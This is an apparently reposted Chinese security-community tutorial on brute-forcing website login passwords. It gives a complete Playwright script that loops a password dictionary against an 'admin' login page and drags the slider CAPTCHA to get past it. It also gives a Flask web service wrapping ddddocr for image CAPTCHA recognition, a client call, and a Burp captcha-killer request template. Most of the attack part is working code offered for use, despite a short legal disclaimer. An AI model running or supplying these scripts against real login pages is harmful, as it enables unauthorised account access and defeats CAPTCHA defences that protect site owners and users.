基于浏览器的口令暴破与图形验证码识别 - 网安 - 专业的网络安全产业、社区、知识平台

本文仅作为技术讨论及分享，严禁用于任何非法用途。

前言

随着网络安全水平的发展，越来越多的网站增加了 RSA 加密、图形验证码等防护手段，传统的口令暴破方式已捉襟见肘，如果高效、低代码的进行口令暴破？本文将介绍一个操作浏览器进行口令暴破的案例与验证码识别工具。

Playwright：浏览器自动化工具

Playwright 是一个强大的 Python 库，仅用一个 API 即可自动执行 Chromium、Firefox、WebKit 等主流浏览器自动化操作，并同时支持以无头模式、有头模式运行。相比传统的 “selenium” 等工具，他可以录制我们对浏览器的操作并自动生成脚本，同时代码也是非常简单，与我们高效工作的目标非常契合。

Playwright：滑动验证码案例

生成登录流程代码

安装 playwright 后，运行下面命令进行录制浏览器操作，并生成代码：

python -m playwright codegen

输入目标 URL 并回车，可以看到自动生成了代码：

输入账号、密码，点击验证码，然后点击登录。录制过程中并不能拖动滑块，所以无法生成滑块的代码，登录操作其余的大部分代码均已生成，也可以看到其代码是非常简单的：

修改为暴破脚本

from playwright.sync_api import Playwright, sync_playwright
# chrome的路径
chromepath = r"chromium-939194\chrome-win\chrome.exe"
from time import sleep
def readpasswd(filename):
    fp = open(r"password.txt", 'r', encoding='utf-8')
    return fp
def run(playwright: Playwright) -> None:
    browser = playwright.chromium.launch(executable_path=chromepath, headless=False)
    context = browser.new_context()
    # Open new page
    page = context.new_page()
    fp = readpasswd(1)
    username = 'admin'
    # 循环读取字典暴破
    for passwd in fp:
        page.goto("http://xxx.xxx.xxx.xxx/login.html")
        # Click input[name="userName"]
        page.click("input[name=\"userName\"]")
        # Fill input[name="userName"]
        page.fill("input[name=\"userName\"]", username)
        # Click input[name="password"]
        page.click("input[name=\"password\"]")
        # Fill input[name="password"]
        page.fill("input[name=\"password\"]", passwd)
        # Click text=/.*\>\>.*/
        # 滑动解锁代码
        s = page.wait_for_selector("text=/.*\\>\\>.*/")
        box = s.bounding_box()
        page.mouse.move(box["x"] + box["width"] / 2, box["y"] + box["height"] / 2)
        page.mouse.down()
        # for i in range(10):
        page.mouse.move(box["x"]+520,box["width"]/2, steps=10)
        # Click text=登录
        page.mouse.up()
        page.click("text=登录")
        sleep(1)
        response_html = page.content()
        print(f'username: {username}, password: {passwd}, length: {len(response_html)}, title: {page.title()}')
    # ---------------------
    context.close()
    browser.close()
with sync_playwright() as playwright:
    run(playwright)

运行效果如下，通过页面长度、标题等输出信息可大致判断是否暴破成功：

ddddocr：Python 验证码识别库

ddddocr 是 Python 的一个 OCR 通用验证码识别 SDK，可离线识别验证码。项目地址：https://github.com/sml2h3/ddddocr。

为了方便使用这个验证码识别工具，我写了个简单的 web api 来方便远程调用验证码识别服务：

### 保存以下代码为py文件，在服务器或者本地运行（需安装好ddddocr库）。
from flask import Flask
from flask import request, abort
import base64
import traceback
import sys
from os.path import join, abspath, dirname
import ddddocr
app = Flask(__name__)
token = 'fbc3a282fd5ed254e54d2260607a1360'
@app.route('/', methods=['GET', 'POST'])
def index():
    res = ''
    if  request.method == 'POST':
        usertoken = request.form.get('token')
        img = request.form.get('b64img')
        if token != usertoken:
            return 'token error!', 403
        else:
            try:
                content = base64.b64decode(img.encode('utf-8'))
                res = classfifyCode(content)
            except:
                traceback.print_exc()
                res = ''
    return res, 200
def classfifyCode(image):
    ocr = ddddocr.DdddOcr()
    res = ocr.classification(image)
    return res
def main():
    app.run(host='0.0.0.0', port=50000, debug=True)
if __name__ == "__main__":
    main()

调用示例如下：

import requests
import base64
# 获取验证码图片
r = requests.get('http://xxx.xxx.xxx/code.php')
img = r.content
b64img = base64.b64encode(img).decode('utf-8')
token = 'fbc3a282fd5ed254e54d2260607a1360'
data = {
    'token': token,
    'b64img': b64img
}
# 验证码识别服务器url
r2 = requests.post('http://127.0.0.1:50000', data=data)
print(r2.text, r.status_code)

这里随便找了个图形验证码测试，能正常检测出来，而且速度非常快：

既然验证码识别的问题解决了，后面就是根据我们的实际需要去编写脚本或者集成到已有工具中了，非常简单。

下面补充一个 burpsuite 验证码识别插件 captcha-killer 调用该接口的案例：

captcha-killer：https://github.com/c0ny1/captcha-killer

POST / HTTP/1.1
Host: 127.0.0.1:50000
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 2776
Content-Type: application/x-www-form-urlencoded
token=fbc3a282fd5ed254e54d2260607a1360&b64img=<@URLENCODE><@BASE64><@IMG_RAW>@IMG_RAW>
@BASE64
>
@URLENCODE
>

小结

本文介绍了浏览器自动化工具 Playwright、验证码识别库 ddddocr 以及滑动验证码的暴破案例，如果遇到图形验证码的站点，只需要把滑动验证码的代码修改为调用 ddddocr 接口即可，相信聪明的读者们一定可以做到，就不重复赘述。

最后，感谢以下开源项目的作者为我们带来如此方便好用的工具：

https://github.com/microsoft/playwright-python

https://github.com/sml2h3/ddddocr

https://github.com/c0ny1/captcha-killer